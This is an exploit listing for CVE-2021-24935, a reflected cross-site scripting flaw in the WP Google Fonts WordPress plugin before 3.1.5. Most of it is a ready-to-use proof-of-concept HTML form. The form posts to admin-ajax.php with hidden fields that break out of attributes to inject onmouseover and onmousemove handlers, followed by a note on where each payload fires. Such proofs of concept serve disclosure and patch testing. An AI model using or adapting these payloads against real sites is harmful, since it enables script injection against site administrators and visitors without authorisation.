Exploit for WP Google Fonts < 3.1.5 - Reflected Cross-Site Scripting CVE-2021-24935

Name: Exploit for WP Google Fonts < 3.1.5 - Reflected Cross-Site Scripting CVE-2021-24935
Rating: 5 (88 reviews)

2021-11-03 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:53702281-1BD5-4828-B7A4-9F81CF0B6BB6
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
        <input type="hidden" name="action" value="googlefont_action" />
        <input type="hidden" name="googlefont_ajax_name" value='" onmouseover=alert(/XSS-1/) t="' />
        <input type="hidden" name="googlefont_ajax_family" value='"onmousemove=alert(/XSS-2/)//' />
        <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    //form1.submit();
</script>
</html>


The XSS from the googlefont_ajax_name will be triggered when the mouse will be over any of the checkbox. The one from googlefont_ajax_family  will be triggered only in section 1 and 4